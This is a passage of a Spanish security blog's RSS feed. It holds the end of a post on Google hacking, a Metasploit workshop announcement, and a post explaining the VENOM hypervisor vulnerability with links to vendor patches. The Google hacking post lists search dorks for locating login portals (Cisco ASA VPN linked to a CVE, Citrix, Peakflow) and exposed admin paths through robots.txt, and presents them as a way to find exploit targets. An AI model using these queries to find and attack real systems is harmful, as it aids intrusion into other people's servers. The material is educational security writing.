información del software instalado, información que podremos usar posteriormente para buscar vulnerabilidades y exploits. Así mismo, podremos realizar el proceso inverso, es decir, a partir de un exploit, usar el buscador de Google para obtener posibles objetivos. Una ultima opción, seria realizar ataques de diccionario o fuerza bruta para intentar obtener acceso al área restringida.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Existen varias búsquedas que nos permiten encontrar paginas de acceso de forma general, es decir, buscaremos paginas de acceso sin tener en cuenta al servicio que podamos acceder si finalmente comprometemos el sistema. Por ejemplo, podemos buscar, mediante la URL, formularios web basados en ASP.NET  que nos permitirán acceder a un área restringida (login.aspx) o formularios :&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ inurl:”/secure/login.aspx” ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Otra opción, es buscar texto en la web que anuncie que nos encontramos ante un portal de acceso, por ejemplo, texto que nos pida que introduzcamos los credenciales necesarios:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intitle:Please Login &quot;You have requested access” ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Hemos visto como buscar páginas de acceso de forma general, pero podemos centrarnos en páginas de un software o hardware en concreto. Por ejemplo, seria interesante encontrar una pagina de acceso a una &lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;b&gt;VPN SSL Clientless&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt; de Cisco ASA, software al que le fue descubierta una vulnerabilidad y que podríamos intentar explotar(&lt;a href=&quot;http://www.cvedetails.com/cve/CVE-2014-3393/&quot;&gt;CVE-2014-3393&lt;/a&gt;):&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ inurl:logon.html &quot;CSCOE&quot; ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Tan solo tendríamos que encontrar una característica diferenciadora en alguno de los elementos (titulo, URL, texto...) para buscar un página de acceso de un software en concreto en el que tengamos interés. Otros ejemplos podrían ser, la búsqueda de paginas de acceso del gestor de aplicaciones virtuales de Citrix &lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;b&gt;XenApp&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;o a la plataforma anti-DDoS &lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;b&gt;Peakflow SP &lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;de Arbor Networks:&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ inurl:&quot;Citrix/XenApp/auth/login.aspx&quot; -Xmarks ]&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;[ intext:&quot;Please Authenticate&quot; intitle:Peakflow&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; color: #666666; margin-bottom: 0pt; margin-top: 0pt;&quot;&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: large; line-height: 19.2000007629395px;&quot;&gt;robots.txt&lt;/b&gt;&lt;br /&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: large; line-height: 19.2000007629395px;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Otra cosa interesante con la que podemos trastear” es con el fichero robots.txt. Este fichero de texto dicta unas “recomendaciones” para los crawlers de buscadores como Google o Bing sobre las páginas que no deben indexar. &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Lo curioso e increíble es que estos buscadores suelen indexar este fichero, por lo que podemos obtener aquella información que los administradores quieren mantener oculta...¿muy lógico no?. &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;Haciendo búsquedas simples, podremos identificar instalaciones de phpMyAdmin, Wordpress, Drupal, Joomla...&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;[ inurl:.com/robots.txt- + &quot;Disallow: /phpmyadmin/&quot; ]&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;[ inurl:&quot;.com/robots.txt&quot; + &quot;Disallow: /wp-admin/ ]&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;[ inurl:&quot;.com/robots.txt&quot; + &quot;Disallow: ?q=admin&quot; ]&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;[ inurl:&quot;/robots.txt&quot; + &quot;Disallow: joomla&quot; ]&lt;/div&gt;&lt;div align=&quot;CENTER&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;E incluso ir mas allá y buscar determinados directorios o ficheros, que pretendan ser ocultados. Cuestión de imaginación.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;En esta segunda parte hemos ejemplificado de forma eficaz como podemos hacer uso de los operadores de Google para buscar información útil de forma rápida y sencilla. Pero existen muchas mas posibilidades, como búsqueda de vulnerabilidades especificas, RFI, XSS, SQLi... Pero eso lo veremos en la tercera parte :)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-family: Tahoma, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;#ST2Labs&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;@seguridadxato2&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;@jm_aparicio&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #666666; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 12px; line-height: 19.2000007629395px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/06/google-hacking-parte-ii.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-losKW1qFbj8/VXqNUIz7VoI/AAAAAAAAdpk/JBb3WPNA16U/s72-c/ST2_Google_Hacking_P2.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-7752185921766107656</guid><pubDate>Sat, 23 May 2015 16:45:00 +0000</pubDate><atom:updated>2015-05-23T18:45:05.063+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ETS Ingenieros</category><category domain="http://www.blogger.com/atom/ns#">ETSI</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Jornadas</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">Sevilla</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Taller</category><title>II Jornada de Seguridad en las Comunicaciones y la Información</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-gnxq4F8Gm4E/VWCuFYyjysI/AAAAAAAAdhY/IzU5gvqcUnY/s1600/ST2_Jornada_SCI2.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;479&quot; src=&quot;http://4.bp.blogspot.com/-gnxq4F8Gm4E/VWCuFYyjysI/AAAAAAAAdhY/IzU5gvqcUnY/s640/ST2_Jornada_SCI2.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;El próximo 9/Junio estaré impartiendo un Taller práctico sobre Metasploit en la Escuela Técnica Superior de Ingeniera de Sevilla, !! sólo 100 plazas ¡¡¡ A continuación toda la información que necesitas saber, daros prisa, además tendréis un diploma de asistencia.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Objetivo&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Jornada especialmente dirigido a Ingeniería de Telecomunicaciones e Ingeniería Informática, esta jornada pretende dar a conocer a los alumnos de últimos cursos el modelo de negocio de la seguridad en las comunicaciones y la información, proporcionando dos casos prácticos de hacking, creación de malware con Metasploit y técnicas de bastionado a uno de los CMS más difundidos y utilizados: Drupal.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Agenda&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;17:30 Bienvenida y presentación&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;17:30&lt;/b&gt; - 1 Ponencia: &lt;b&gt;La Seguridad Informática: Modelo de Negocio&lt;/b&gt; - Godofredo Fernández - Telefónica&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;18:30&lt;/b&gt; - 2 Ponencia: &lt;b&gt;Hacking Ético: Taller de Metasploit &lt;/b&gt;- Julian J González - ST2Labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;19:30&lt;/b&gt; - 3 Ponencia: &lt;b&gt;Seguridad Drupa&lt;/b&gt;l - Ezequiel Vázquez - Institute for Integrative Nutrition&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;20:30 - Ronda Preguntas y clausura de la Jornada.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Lugar&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Tendrá lugar el &lt;b&gt;9 de Junio 2015 a la 17:30&lt;/b&gt; en el Salón de Grados de la&lt;b&gt; E.T.S Ingenieros de la Universidad de Sevilla.&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-usfm6061aS4/VWCov-Ba5TI/AAAAAAAAdhI/lSasWO6a5zo/s1600/ETS_Ing_Sevillao.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;604&quot; src=&quot;http://4.bp.blogspot.com/-usfm6061aS4/VWCov-Ba5TI/AAAAAAAAdhI/lSasWO6a5zo/s640/ETS_Ing_Sevillao.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Mi charla será un Taller práctico sobre la herramienta Metasploit, con un ejemplo práctico sobre un escenario real.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Inscripciones y Diplomas&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Abierto plazo de inscripción del 22 de Mayo 2015 al 08-Junio-2015 mediante el envío de un email a &lt;b&gt;secreait@trajano.us.es&lt;/b&gt; con el Asunto: Jornada de Seguridad, en el cuerpo del correo indicar:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Nombre y apellidos de asistente.&lt;/li&gt;&lt;li&gt;Titulación y curso en que está matriculado.&lt;/li&gt;&lt;/ul&gt;Admisión de solicitudes será por riguroso orden de llegada, se informará al interesado por email.&lt;br /&gt;&lt;br /&gt;Se entregará diploma de asistencia a la jornada para inclusión en el cirriculum vitae personal.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Referencia:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;http://nerva.us.es/seguridad-9j.pdf&lt;br /&gt;&lt;br /&gt;#ST2Labs&lt;br /&gt;@seguridadxato2&lt;br /&gt;&lt;br /&gt;</description><link>http://www.seguridadparatodos.es/2015/05/ii-jornada-de-seguridad-en-las.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-gnxq4F8Gm4E/VWCuFYyjysI/AAAAAAAAdhY/IzU5gvqcUnY/s72-c/ST2_Jornada_SCI2.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-5325672157381599301</guid><pubDate>Thu, 14 May 2015 16:30:00 +0000</pubDate><atom:updated>2015-05-14T18:30:17.899+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AppVMs</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">IT Security</category><category domain="http://www.blogger.com/atom/ns#">KVM</category><category domain="http://www.blogger.com/atom/ns#">QEMU</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">VENOM</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidad</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">XEN</category><title>VENOM Vulnerability - All VM are in Risk? (CVE-2015-3456) </title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-6I6bZXMhIew/VVTJmVCRS5I/AAAAAAAAddA/L_TGwgJJBOw/s1600/ST2_VENOM_Head.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-6I6bZXMhIew/VVTJmVCRS5I/AAAAAAAAddA/L_TGwgJJBOw/s1600/ST2_VENOM_Head.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://venom.crowdstrike.com/&quot; target=&quot;_blank&quot;&gt;VENOM&lt;/a&gt;&amp;nbsp;(&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3456&quot; target=&quot;_blank&quot;&gt;CVE-2015-3456&lt;/a&gt;) is (Virtualized Eniroment Negleted Operations Manipulation), lo que viene a decir, que se ha descubierto una vulnerabilidad que permite acceder por completo al entorno de ejecución del hipervisor desde una máquina virtual cualquiera, lo que significa acceder por completo al entorno de ejecución del resto de máquina virtuales que tiene el Host en ejecución.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt; Xen Security Advisory CVE-2015-3456 / XSA-133&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;version 2&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;Privilege escalation via emulated floppy disk drive&lt;/div&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;A continuación un ejemplo gráfico que ilustrará en que consiste la vulnerabilidad, y ayudará para evaluar el nivel de riesgo que tiene tu organización, si estas afectado por VENOM:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://venom.crowdstrike.com/assets/venom-graphic.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://venom.crowdstrike.com/assets/venom-graphic.png&quot; height=&quot;640&quot; width=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Crowdstrike - VENOM vulnerability&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;&lt;br /&gt;This vulnerability may allow an attacker to escape from the confines of an affected virtual machine (VM) guest and potentially obtain code-execution access to the host.&lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;Pero &lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;¿Qué sistema de virtualización se encuentra afectado por dicha vulnerabilidad?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;The bug is in QEMU’s virtual Floppy Disk Controller (FDC). This vulnerable FDC code is used in numerous virtualization platforms and appliances, notably Xen, KVM, and the native QEMU client.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;Sabemos &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;por tanto que no todas VM se encuentran en riesgo,&lt;/span&gt;&lt;/b&gt; sino aquellas que están &quot;running&quot; en sistema virtuales basado en XEN, KVM y QEMU.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Las máquinas virtuales sobre VMware, Microsoft Hyper-V y&amp;nbsp;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;Bochs&lt;/span&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&amp;nbsp; no se encuentran afectadas por esta vulnerabilidad.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;b&gt;UPDATE:&lt;/b&gt; Si trabajas con KVM, QEMU y XEN Hypervisor, consulta las novedades en parches y actualizaciones de seguridad, aquí os dejo una muestra:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div style=&quot;background-color: rgba(0, 0, 0, 0.0392157); border: 0px; box-sizing: border-box; color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;CrowdStrike is aware of the following vendor patches, advisories, and notifications.&lt;/div&gt;&lt;ul style=&quot;background-color: rgba(0, 0, 0, 0.0392157); border: 0px; box-sizing: border-box; color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px; margin: 0px 0px 20px 20px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;QEMU:&amp;nbsp;&lt;a href=&quot;http://git.qemu.org/?p=qemu.git;a=commitdiff;h=e907746266721f305d67bc0718795fedee2e824c&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;http://git.qemu.org/?p=qemu.git;a=commitdiff;h=e907746266721f305d67bc0718795fedee2e824c&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Xen Project:&amp;nbsp;&lt;a href=&quot;http://xenbits.xen.org/xsa/advisory-133.html&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;http://xenbits.xen.org/xsa/advisory-133.html&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Red Hat:&amp;nbsp;&lt;a href=&quot;https://access.redhat.com/articles/1444903&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://access.redhat.com/articles/1444903&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Citrix:&amp;nbsp;&lt;a href=&quot;http://support.citrix.com/article/CTX201078&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;http://support.citrix.com/article/CTX201078&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;FireEye:&amp;nbsp;&lt;a 